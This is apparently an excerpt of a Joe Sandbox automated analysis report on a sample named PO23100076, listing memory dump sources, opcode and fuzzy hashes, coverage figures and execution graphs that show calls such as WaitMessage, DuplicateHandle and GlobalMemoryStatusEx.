                                                • Instruction Fuzzy Hash: E2C149B1C917459BD310CF65E85AA893BB1BB81324FD04B09D2612F2D5FBB4126EEF48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1277105916.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6820000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 591f7df4aa886faecf12d12ddf4555567d9d3e7b8eb160bedbc5263176cbe63b
                                                • Instruction ID: c6ca6b844bd4798173a7e09b5be16660477d66723000eec334ed5ede2487bfaf
                                                • Opcode Fuzzy Hash: 591f7df4aa886faecf12d12ddf4555567d9d3e7b8eb160bedbc5263176cbe63b
                                                • Instruction Fuzzy Hash: 9D610575D0522ECFDB68CFA9C840AEEBBB6FF89305F109029D919A7215D7305986CF80
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 529fcf70204a21b95c9819de302f92d96274fb7f0b1d79891cc004cd8f6c4094
                                                • Instruction ID: 68f8ef75c9f94648a86251027a9c9e23b98e25d108994cbccea560a4644edae9
                                                • Opcode Fuzzy Hash: 529fcf70204a21b95c9819de302f92d96274fb7f0b1d79891cc004cd8f6c4094
                                                • Instruction Fuzzy Hash: 07516F74E042598FDB14CF69C5805AEFBF2BF89304F24816AD459AB356D7309E42CF61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1278385384.0000000006F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6f00000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dc37b9fd04ba06ddd2bedb321dbf9eafdebe044bfc9be9c5cf33e2b4ea0d7b64
                                                • Instruction ID: d2d8b687a9c4d563b390ed8713a67ee9c415b7d3846127af735a00bf1d70a931
                                                • Opcode Fuzzy Hash: dc37b9fd04ba06ddd2bedb321dbf9eafdebe044bfc9be9c5cf33e2b4ea0d7b64
                                                • Instruction Fuzzy Hash: FD510875E002198FEB14DFA9C5809AEFBF2BF89304F248169D419AB355D7319E42DFA0

                                                Execution Graph

                                                Execution Coverage:7.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:32
                                                Total number of Limit Nodes:6
                                                execution_graph 30531 4eaae98 DuplicateHandle 30532 4eaaf2e 30531->30532 30527 62c2f48 30529 62c2f5d 30527->30529 30528 62c31a8 30529->30528 30530 62c35b8 GlobalMemoryStatusEx 30529->30530 30530->30529 30497 4eab4b0 30498 4eab4de 30497->30498 30501 4eaa9ec 30498->30501 30500 4eab4fe 30500->30500 30502 4eaa9f7 30501->30502 30503 4eabc7f 30502->30503 30507 6470006 30502->30507 30515 6472ecb 30502->30515 30519 6470040 30502->30519 30503->30500 30510 6470062 30507->30510 30508 6471e7c 30508->30503 30509 6472ebe 30511 64733b0 WaitMessage 30509->30511 30512 6472f9a 30509->30512 30510->30508 30510->30509 30513 6470006 WaitMessage 30510->30513 30514 6470040 WaitMessage 30510->30514 30511->30509 30512->30503 30513->30510 30514->30510 30518 6472ec1 30515->30518 30516 64733b0 WaitMessage 30516->30518 30517 6472f9a 30517->30503 30518->30516 30518->30517 30521 6470062 30519->30521 30520 6471e7c 30520->30503 30521->30520 30524 6472ebe 30521->30524 30525 6470006 WaitMessage 30521->30525 30526 6470040 WaitMessage 30521->30526 30522 64733b0 WaitMessage 30522->30524 30523 6472f9a 30523->30503 30524->30522 30524->30523 30525->30521 30526->30521
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2493353638.0000000006470000.00000040.00000800.00020000.00000000.sdmp, Offset: 06470000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_6470000_PO23100076.jbxd
                                                Similarity
                                                • API ID: MessageWait
                                                • String ID:
                                                • API String ID: 1058943002-0
                                                • Opcode ID: f48c6a0e5c9beb83cd5b09f5884f233e8694f7a763a41328c11b0609979639cd
                                                • Instruction ID: b4af45bf7cfea3389b55da6a57f2753b0cb9cf63db63186df726214bc53ff88a
                                                • Opcode Fuzzy Hash: f48c6a0e5c9beb83cd5b09f5884f233e8694f7a763a41328c11b0609979639cd
                                                • Instruction Fuzzy Hash: 76630931D10B198ADB51EF68C8846D9F7B1FF99300F15C79AE4587B221EB70AAC5CB81

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3525 62c41a0-62c41bb 3526 62c41bd-62c41e4 call 62c3570 3525->3526 3527 62c41e5-62c4204 call 62c357c 3525->3527 3533 62c420a-62c4269 3527->3533 3534 62c4206-62c4209 3527->3534 3541 62c426f-62c42fc GlobalMemoryStatusEx 3533->3541 3542 62c426b-62c426e 3533->3542 3546 62c42fe-62c4304 3541->3546 3547 62c4305-62c432d 3541->3547 3546->3547
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2493226703.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_62c0000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c5e8ce7df5dd6216919a5f2de1b5a22ba49f53fdc17d3fdd2c9202ac10427287
                                                • Instruction ID: 24ff014815f743e6941c6aba2a858b820a2bf814aea195494e731f1a300c4ff1
                                                • Opcode Fuzzy Hash: c5e8ce7df5dd6216919a5f2de1b5a22ba49f53fdc17d3fdd2c9202ac10427287
                                                • Instruction Fuzzy Hash: A8412331D143968FCB10DFB9D81469EBFF1AF89220F15866ED884E7281DB749845CBE1
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04EAAF1F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2491965612.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4ea0000_PO23100076.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 067d672daca722668e77ea0bb7dd590d88e8c05eb90a5ff2bbecb87780ec767a
                                                • Instruction ID: bf002e556bd09ecc05f166482f37138ae854c997427758b3ee9bf380d7338b97
                                                • Opcode Fuzzy Hash: 067d672daca722668e77ea0bb7dd590d88e8c05eb90a5ff2bbecb87780ec767a
                                                • Instruction Fuzzy Hash: 6521E4B5D003099FDB10CF9AD884ADEBBF5EB48310F14841AE914A7350D374A954CFA5
                                                APIs
                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 04EAAF1F
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2491965612.0000000004EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EA0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_4ea0000_PO23100076.jbxd
                                                Similarity
                                                • API ID: DuplicateHandle
                                                • String ID:
                                                • API String ID: 3793708945-0
                                                • Opcode ID: 926473e0864b25263d164e448100d31a29ed07a948a2e5b0f7f91bbd37d89096
                                                • Instruction ID: 94ef4cc90db003aac23b1a6ad764ad8110a47b887cf51e6c48803f92e29763de
                                                • Opcode Fuzzy Hash: 926473e0864b25263d164e448100d31a29ed07a948a2e5b0f7f91bbd37d89096
                                                • Instruction Fuzzy Hash: E821E2B5D003099FDB10CFA9D985ADEBBF5EB48320F14842AE918A7350D378A954CFA5
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE ref: 062C42EF
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2493226703.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_62c0000_PO23100076.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 58c0262b242efc379bef8eda1a90389f0262d09f5ac137304b7c141a63f7cd4b
                                                • Instruction ID: d3f9547adce604fb59f6ce18c25edba0501c0c50ccc4248ea4eec2601b7822c1
                                                • Opcode Fuzzy Hash: 58c0262b242efc379bef8eda1a90389f0262d09f5ac137304b7c141a63f7cd4b
                                                • Instruction Fuzzy Hash: 3F1123B1C1025A9FDB10DF9AC445BDEFBF4AF48320F11822AD818B7240D778A945CFA1
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2488922315.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_102d000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f5d5dde649ee7126987cb99b6ca9f5a21ce51022c12a7136047834e3363bbd4d
                                                • Instruction ID: d61a08955c83f6ec79805147ca24dc75fc1949e578b0b4d559e9b3ec40bf4f8e
                                                • Opcode Fuzzy Hash: f5d5dde649ee7126987cb99b6ca9f5a21ce51022c12a7136047834e3363bbd4d
                                                • Instruction Fuzzy Hash: 40212271604340DFDB25DF94D9C4B16BBA5EB84314F20C5ADE98A0B2A6C33AD807CB62
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2488922315.000000000102D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0102D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_102d000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 804b22e4d85b4a0dda2e53774972d7289051e8eb7b6ec9956cb62cdc207dd24e
                                                • Instruction ID: e00c68651db05a68eb5e86a2563999b22ddf2d56e168ee3634dd8dbe4236e48f
                                                • Opcode Fuzzy Hash: 804b22e4d85b4a0dda2e53774972d7289051e8eb7b6ec9956cb62cdc207dd24e
                                                • Instruction Fuzzy Hash: 072180755083809FCB12CF64D9D4711BFB1EB46214F28C5DAD8898F2A7C33A9816CB62
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.2488858636.000000000101D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0101D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_101d000_PO23100076.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05b4b8e96950b7fbb52ec5485073c597cfb3a0add6e1e4f3f2a9ce3fdd7aa0ad
                                                • Instruction ID: d2d834b5e3fe826114184c4d24f640d07bf504362d23d2f3d683ea0a194feb49
                                                • Opcode Fuzzy Hash: 05b4b8e96950b7fbb52ec5485073c597cfb3a0add6e1e4f3f2a9ce3fdd7aa0ad
                                                • Instruction Fuzzy Hash: 0BF062715043449EEB648B1ADC88B62FFD8EB45735F18C99AED4C4B287C2799844CBB1